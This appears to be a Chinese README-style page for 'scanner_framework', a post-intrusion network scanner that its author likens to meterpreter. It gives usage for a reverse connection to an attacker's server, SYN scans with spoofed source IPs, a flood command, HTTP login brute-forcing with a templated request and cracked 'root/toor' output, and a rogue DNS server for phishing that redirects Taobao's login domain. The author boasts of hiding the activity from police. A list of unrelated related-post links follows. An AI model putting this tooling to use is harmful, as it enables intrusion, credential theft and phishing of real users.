scanner_framework

中文: 网络探测框架,适用于入侵到内网探测其它网络设备,探测器具有体积小,功能多,而且带有反向连接从内网穿透出外网连接控制终端,通信数据采用动态加密,再也不怕警察叔叔知道我在干坏事儿啦,为了方便破解一些弱口令设备,内部带有在线破解功能(暂时支持HTTP 破解).如果觉得这些功能满足不了需求,可以使用端口映射把你需要的工具直接通过隧道对接到内网的某台指定的主机端口上进行扫描…-- LCatro

中文(简体) : 这是一个内部网络扫描仪,如 meterpreter 。我将创建更多的功能到它扫描仪(现在包括许多基本的网络扫描仪和网络破解[如BurpSuite,crack HTTP])。反向连接功能是为了方便攻击者管理被黑客入侵的机器和密码进行通信。隧道连接可帮助您的攻击过程的网络流穿过内部网络的防火墙。

###启动方式 [如何启动它] scanner.exe 控制台启动 [通过控制台启动它]
scanner.exe -bind [%port%] 绑定端口,远程访问 [绑定本地端口等待您连接它]
scanner.exe -recon %ip% [%port%] 反向连接,远程访问,默认是80,注意记得先启动reverse_server ,不然扫描器.exe 不能成功连接 [反向连接指定 ip,警告!Remenber 首先启动reverse_server,然后使用此参数启动扫描仪.exe]###使用方法 [如何使用它 ] 扫描当前网段存活的主机,并且自动搜集数据 [使用 ARP 请求查询当前网络中的实时计算机]
使用:
arp
获取当前主机的网络信息
你最了解它..]
using:ping %ip/host%
TCP SYN 扫描主机 [tcp syn scan,set -P scanner will test port,set -F is fake a ip for hide itsalf in attack flow]
using:scan %ip% [-P:[port1,port2,port3,...]] [-F:[fake_ip1,fake_ip2,...]]
洪水攻击主机 [不要使用它 ,因为你会暴露,所以我从不开发这个函数]
使用:flood %ip% [-P:[port1,...]] [-F:[fake_ip1,...]]
在线破解 [online crack]
using:crack %ip% %port% [%user_dictionary_path% %password_dictionary_path%]
路由跟踪 [tracert route]
using:tracert %ip/host%
抓取页面 [get a HTML page on server]
using:getpage %ip% [-PORT:%port%] [-PATH:%path%]
启动端口转发功能 [tunnal port]
using:route -R:[%remote_ip%,%remote_port%] -L:[[%local_ip%,]%local_port%]
启动DNS 服务器 [dns server]
using:dns [run|start] | add %host% %ip% |删除 %ip%
获取外网IP 地址和粗略定位 [get internet ip no is internal network ip and get the location]
using:ip
显示帮助 [show help]
using:help
退出 [exit scanner]
using:quit
###在线破解 [关于在线破解]在线破解功能原理是通过自己构造特定的HTTP 数据包然后程序根据字典穷举测试出帐号密码什么是表达式?表达式的意思是给程序一个填充数据的框架,在接下来的穷举测试中会根据表达式内的关键字来填充数据,下面是在线破解的例子:本地网络192.168.1.103:80 启用了PHP 服务器,在探测器里面输入破解命令破解 192.168.1.103 80然后会提示输入表达式输入您的破解快车:输入数据包数据: POST http://192.168.1.103:80/api/analays.php HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
referer: http://192.168.1.103/api/analays.php
Accept-Language: zh-CN
用户代理:Mozilla/4.0(兼容;MSIE 7.0;视窗NT 6.1;哇64;三叉戟/5.0;SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 192.168.1.103
Content-length: %length%
Pragma: no-cacheuser=%username%&pass=%password%其中Content-length: %length% 的意思是让程序自动在此填充上下文的大小[因为这个长度是会变化的],%username% 和%password% 就是自动填充用户名和密码
[这里也可以不需要全部都用,比如破解水星路由器,直接填%password% 即可启动]
最后输入来确认数据包填写完成,如果中间某个位置出现填写错误就输入来重新填写破解数据包,下面的输入成功判断条件也是同理..输入您的检查期限:输入成功判断条件,由于经过测试,如果输入密码成功的话,页面会返回一个包含Success 的字符串,然后把他作为破解成功的测试条件..
成功现在破解!网络破解 - 目标:192.168.1.103:80
用户名:root 密码:toor破解完成表达式函数:base64(%string%) -- 采用base64 编码
time() -- 获取系统时间
len(%string%) -- 统计字符串长度
rnd([%low%-%up%]) -- 在%low% 到%up% 之间生成随机数例:破解水星的数据包 (其它都差不多,关键在Cookie):饼干:a2404_pages=10;a2404_times=5;授权 = 基本 %20base64(管理员:%密码%)接下来会把%password% 先填充好之后再编码base64

DNS 服务器 [关于 DNS 服务器]

DNS 服务器是针对内网的信息钓鱼,比如通过伪造的站点来钓得更多的个人信息或者欺骗应用程序更新,如果上面的用法还不太明白的话可以看这里 [DNS 服务器通常使用重定向到网络钓鱼网站]

dns run 启动DNS 服务器 [运行 dns 服务器]
dns 退出DNS 服务器 [退出 dns 服务器]
dns 添加 m.login.taobao.com 127.0.0.1 把淘宝的手机登陆域名绑定到本地 IP [点 m.login.taobao.com 通过 dns 设置到 localhost]
dns 删除 www.baidu.com 删除DNS 查询项目 [删除此记录]

端口转发原理 [tunnal 端口设计]

###Other

#####reverse_server 是用来做反向连接用的服务端

#####scanner.exe -bind 参数启动程序需要自己主动连过去,但是客户端还没写,也没什么需求,以后慢慢来…

【内部网络扫描仪,网络探测框架】相关推荐

  1. R-EACTR:一个设计现实网络战演习的框架

    本材料来源于国防部资助并由卡内基梅隆大学软件工程研究所的运营的项目,合同编号为FA8721-05-C-0003,该项目是一家联邦资助的研究与开发中心. 本材料中所表达的任何意见.调查结果和结论或建议均 ...

  2. 网络协议及网络软件框架设计网络协议

    >>Drew的主页--->网络协议 主页 VxWorks ARM PowerPC 硬件驱动 网络协议 程序示例 下载 个人兴趣 网络协议及网络软件框架设计 网络协议 TCP/IP ( ...

  3. iOS开发网络篇—使用ASI框架进行文件下载

    iOS开发网络篇-使用ASI框架进行文件下载 说明:本文介绍iOS网络编程中经常用到的框架ASI,如何使用该框架进行文件的下载. 一.简单介绍 代码示例: 1 #import "YYView ...

  4. 计算机如何连接网络扫描仪,如何添加局域网网络扫描仪

    如何添加局域网网络扫描仪 局域网网络扫描仪是可以给局域网计算机客户端提供扫描功能的办公设备,它可以是局域网功能单一的扫描仪,也可以是多功能办公设备上的其中一种功能.相对于功能单一的扫描仪而言,多功能办 ...

  5. fing网络扫描仪android,Fing网络扫描仪

    Fing网络扫描仪app是一款非常贴心实用了便民服务网络安全环境扫描软件,通过这个软件可以查看你当前使用的网络是否安全,你家中的wifi有没有被别人窃取,还可以查看当前所链接wifi的设备信息,你可以 ...

  6. android网络扫描工具,fing网络扫描仪安卓版

    fing网络扫描仪安卓版是一款专业的网络环境扫描软件,这款软件可以帮你扫描手机当前所处wifi环境的安全性,如果你接入的是自家的网络,可以查看当前wifi连接的设备,并将自己不认识的设备给踢出去拉入黑 ...

  7. 网络空间资产探测关键技术研究

    摘 要: 如今,网络空间日益复杂,越来越多的终端设备如智能手机.打印机.网络摄像头.数字媒体设备等也加入到网络空间中.通过网络空间资产探测,可以及时发现潜在的安全风险,避免被不法之徒攻击.基于此,论述 ...

  8. python基础实例 韦玮 pdf_精通Python网络爬虫 核心技术、框架与项目实战 作者:韦玮PDF...

    文件目录: 书本介绍: 书名 精通Python网络爬虫:核心技术.框架与项目实战 作者 韦玮著 出版社 机械工业出版社 出版日期 2017 内容简介 本书从系统化的视角,为那些想学习Python网络爬 ...

  9. 精通Python网络爬虫_核心技术框架与项目实战_韦玮.pdf

    精通Python网络爬虫_核心技术框架与项目实战_韦玮 编辑推荐 从技术.工具.实战3个维度讲透Python网络爬虫各项核心技术和主流框架,深度讲解网络爬虫的抓取技术与反爬攻关技巧 内容简介 随着大数 ...

最新文章

  1. mciSendString用法
  2. Hibernate 统计记录总数方法汇总
  3. Ansible之playbook(剧本)介绍和配置详解
  4. javaweb调用python算法_请教怎么用java远程调用python? 多谢
  5. android内存及内存溢出分析
  6. 01Pandas_数据结构
  7. SpringMVC 的总结
  8. python pil 模块将随机字符生成验证码
  9. PHP 配置open_basedir,让各虚拟站点独立运行
  10. 华为数通hcia认证考试题库有多少题?
  11. CFree注册码及破解过程【转】
  12. 电大计算机绘图三锥图形,电大机械制图课程教学辅导
  13. STM32F407ZET6音乐播放器
  14. ps文件太大无法保存?
  15. itext实现横向pdf打印
  16. FrankMocap:A Monocular 3D Whole-Body Pose Estimation System via Regression and Integration 2021阅读理解
  17. Excel操作-多条件筛选
  18. Anonympy——使用Python进行数据匿名化
  19. 微服务系统异常检测和根因定位 方法综述
  20. Databricks 加载MySQL数据

热门文章

  1. PotPlayer下载
  2. rust最低什么显卡能游戏_rust腐蚀游戏配置要求是什么 腐蚀Rust配置要求汇总
  3. 方舟生存进化mysql_宝宝学英语abcdefg
  4. 数据库常用增、删、改、查sql语句
  5. Android Studio之正确导入SO库
  6. redis使用布隆过滤器
  7. 结合axios(formdata)+vue-cropper+element ui实现头像图片剪切上传
  8. yolov5/v7修改标签和检测框显示【最全】
  9. WGCNA 简明指南|1. 基因共表达网络构建及模块识别
  10. 信捷 XDH Ethercat A_FOLLOW指令